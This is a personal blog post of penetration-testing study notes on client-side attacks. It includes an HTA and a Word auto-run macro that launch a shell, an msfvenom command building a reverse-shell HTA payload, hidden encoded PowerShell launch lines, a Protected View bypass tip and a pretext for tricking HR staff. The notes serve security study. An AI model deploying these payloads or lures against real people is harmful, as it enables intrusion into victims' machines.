<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="Study Notes - 2021/03/21"><meta name="keywords" content="Study Notes,Penetration Testing"><meta name="author" content="Gavin Cui"><meta name="copyright" content="Gavin Cui"><title>Study Notes - 2021/03/21 | Gavin's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  hexoVersion: '5.4.0'
} </script><meta name="generator" content="Hexo 5.4.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Client-side-Attack"><span class="toc-number">1.</span> <span class="toc-text">Client-side Attack</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Passive-Client-information-Gathering"><span class="toc-number">1.1.</span> <span class="toc-text">Passive Client information Gathering</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Active-Client-information-Gathering"><span class="toc-number">1.2.</span> <span class="toc-text">Active Client information Gathering</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Social-engineering-and-client-side-attacks"><span class="toc-number">1.3.</span> <span class="toc-text">Social engineering and client-side attacks</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Client-Fingerprinting"><span class="toc-number">1.4.</span> <span class="toc-text">Client Fingerprinting</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Leveraging-HTML-Applications"><span class="toc-number">1.5.</span> <span class="toc-text">Leveraging HTML Applications</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Microsoft-macros"><span class="toc-number">2.</span> <span class="toc-text">Microsoft macros</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Object-Linking-and-Emedding"><span class="toc-number">3.</span> <span class="toc-text">Object Linking and Emedding</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Evading-Protected-View"><span class="toc-number">4.</span> <span class="toc-text">Evading Protected View</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Locating-public-exploits"><span class="toc-number">5.</span> <span class="toc-text">Locating public exploits</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Offline-exploit-resource"><span class="toc-number">6.</span> <span class="toc-text">Offline exploit resource</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#nmap-NSE-script"><span class="toc-number">7.</span> <span class="toc-text">nmap NSE script</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#The-Browser-Exploitation-Framework-BeEF"><span class="toc-number">8.</span> <span class="toc-text">The Browser Exploitation Framework (BeEF)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Metasploit-Framework"><span class="toc-number">9.</span> <span class="toc-text">Metasploit Framework</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Put-all-together"><span class="toc-number">10.</span> <span class="toc-text">Put all together</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Gavin Cui</div><div class="author-info__description text-center">No Description</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">27</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">9</span></a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Gavin's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">Study Notes - 2021/03/21</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2021-03-21</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="Client-side-Attack"><a href="#Client-side-Attack" class="headerlink" title="Client-side Attack"></a>Client-side Attack</h1><h2 id="Passive-Client-information-Gathering"><a href="#Passive-Client-information-Gathering" class="headerlink" title="Passive Client information Gathering"></a>Passive Client information Gathering</h2><p>Googled for various known external corporate IP addresses and found one on a site that hosts collected user agent data from various affiliate sites.</p>
<h2 id="Active-Client-information-Gathering"><a href="#Active-Client-information-Gathering" class="headerlink" title="Active Client information Gathering"></a>Active Client information Gathering</h2><h2 id="Social-engineering-and-client-side-attacks"><a href="#Social-engineering-and-client-side-attacks" class="headerlink" title="Social engineering and client-side attacks"></a>Social engineering and client-side attacks</h2><p>Cheat HR, by sending their a document, and ask what types of os and broseswer they are using </p>
<h2 id="Client-Fingerprinting"><a href="#Client-Fingerprinting" class="headerlink" title="Client Fingerprinting"></a>Client Fingerprinting</h2><p>fingerpringjs  </p>
<p>use ajax to post components array to the server  </p>
<p>sudo chown www-data:www-data fp  </p>
<h2 id="Leveraging-HTML-Applications"><a href="#Leveraging-HTML-Applications" class="headerlink" title="Leveraging HTML Applications"></a>Leveraging HTML Applications</h2><p>If a file is created with the extension of .hta instead of .html, Internet Explorer will automatically nterpret it as a HTML Application and offer the ability to execute it using the mshta.exe program.</p>
<p>work with IE </p>
<p>Similar to an HTML page, a typical HTML Application includes html, body, and script tags followed by JavaScript or VBScript code. However, since the HTML Application is executed outside the browser we are free to use legacy and dangerous features that are often blocked within the browser  </p>
<p>An additional window will open, add close </p>
<p>``</p>
<html>
<head>
<script>
var c= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>
self.close();
</script>
</body>
</html>
``

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo msfvenom -p windows&#x2F;shell_reverse_tcp LHOST&#x3D;192.168.119.148 LPORT&#x3D;4444 -f hta-psh -o &#x2F;var&#x2F;www&#x2F;html&#x2F;evil.hta</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">iKqr8BWFyuiK.Run &quot;powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcg</span><br></pre></td></tr></table></figure>

<p>-nop no profile<br>-w hidden do not pop up a window<br>-EncodedCommand  -e  </p>
<h1 id="Microsoft-macros"><a href="#Microsoft-macros" class="headerlink" title="Microsoft macros"></a>Microsoft macros</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Sub AutoOpen()</span><br><span class="line">MyMacro</span><br><span class="line">End Sub</span><br><span class="line">Sub Document_Open()</span><br><span class="line">MyMacro</span><br><span class="line">End Sub</span><br><span class="line">Sub MyMacro()</span><br><span class="line">CreateObject(&quot;Wscript.Shell&quot;).Run &quot;cmd&quot;</span><br><span class="line">End Sub</span><br></pre></td></tr></table></figure>

<p>We must save the containing document as either .docm or the older .doc format, which supports<br>embedded macros, but must avoid the .docx format, which does not support them.</p>
<h1 id="Object-Linking-and-Emedding"><a href="#Object-Linking-and-Emedding" class="headerlink" title="Object Linking and Emedding"></a>Object Linking and Emedding</h1><p>Insert batch object into a word file<br>change the present, display as icon, change the icon<br>Can also change caption<br>user need to click on the icon to lanuch the batch file  </p>
<p>START powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBj….  </p>
<h1 id="Evading-Protected-View"><a href="#Evading-Protected-View" class="headerlink" title="Evading Protected View"></a>Evading Protected View</h1><p>block the execution of macro and embeded object<br>bypass is to use another Office application.  </p>
<h1 id="Locating-public-exploits"><a href="#Locating-public-exploits" class="headerlink" title="Locating public exploits"></a>Locating public exploits</h1><p><a target="_blank" rel="noopener" href="https://www.exploit-db.com/">https://www.exploit-db.com</a>  </p>
<p><a target="_blank" rel="noopener" href="https://www.securityfocus.com/">https://www.securityfocus.com</a><br>A vulnerability database instead of exploit database, reference may contain some PoC </p>
<p><a target="_blank" rel="noopener" href="https://packetstormsecurity.com/">https://packetstormsecurity.com</a><br>It provides up-to-date information on security news and vulnerabilities as well as recently published tools by security vendors</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">firefox --search &quot;Microsoft Edge site:exploit-db.com&quot;</span><br></pre></td></tr></table></figure>
<p>inurl intext and intitle  </p>
<h1 id="Offline-exploit-resource"><a href="#Offline-exploit-resource" class="headerlink" title="Offline exploit resource"></a>Offline exploit resource</h1><p>SearchSploit  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt update &amp;&amp; sudo apt install exploitdb</span><br></pre></td></tr></table></figure>
<p>to make sure it is lateset  </p>
<p>/usr/share/exploitdb/exploits/  </p>
<h1 id="nmap-NSE-script"><a href="#nmap-NSE-script" class="headerlink" title="nmap NSE script"></a>nmap NSE script</h1><p>kali@kali:~$ cd /usr/share/nmap/scripts<br>kali@kali:/usr/share/nmap/scripts$ grep Exploits *.nse<br>nmap –script-help=clamav-exec.nse  </p>
<h1 id="The-Browser-Exploitation-Framework-BeEF"><a href="#The-Browser-Exploitation-Framework-BeEF" class="headerlink" title="The Browser Exploitation Framework (BeEF)"></a>The Browser Exploitation Framework (BeEF)</h1><h1 id="Metasploit-Framework"><a href="#Metasploit-Framework" class="headerlink" title="Metasploit Framework"></a>Metasploit Framework</h1><h1 id="Put-all-together"><a href="#Put-all-together" class="headerlink" title="Put all together"></a>Put all together</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap 10.11.0.128 -p- -sV -vv --open --reason</span><br></pre></td></tr></table></figure>
<p>  –open: Only show open (or possibly open) ports<br>  –reason: Display the reason a port is in a particular state  </p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">Gavin Cui</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://gavincrz.github.io/2021/03/21/Study-Notes-2021-03-21/">https://gavincrz.github.io/2021/03/21/Study-Notes-2021-03-21/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Study-Notes/">Study Notes</a><a class="post-meta__tags" href="/tags/Penetration-Testing/">Penetration Testing</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2021/03/23/Study-Notes-2021-03-22/"><i class="fa fa-chevron-left">  </i><span>Study Notes - 2021/03/22</span></a></div><div class="next-post pull-right"><a href="/2021/03/21/Study-Notes-2021-03-20/"><span>Study Notes - 2021/03/20</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2021 By Gavin Cui</div><div class="framework-info"><span>Driven - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>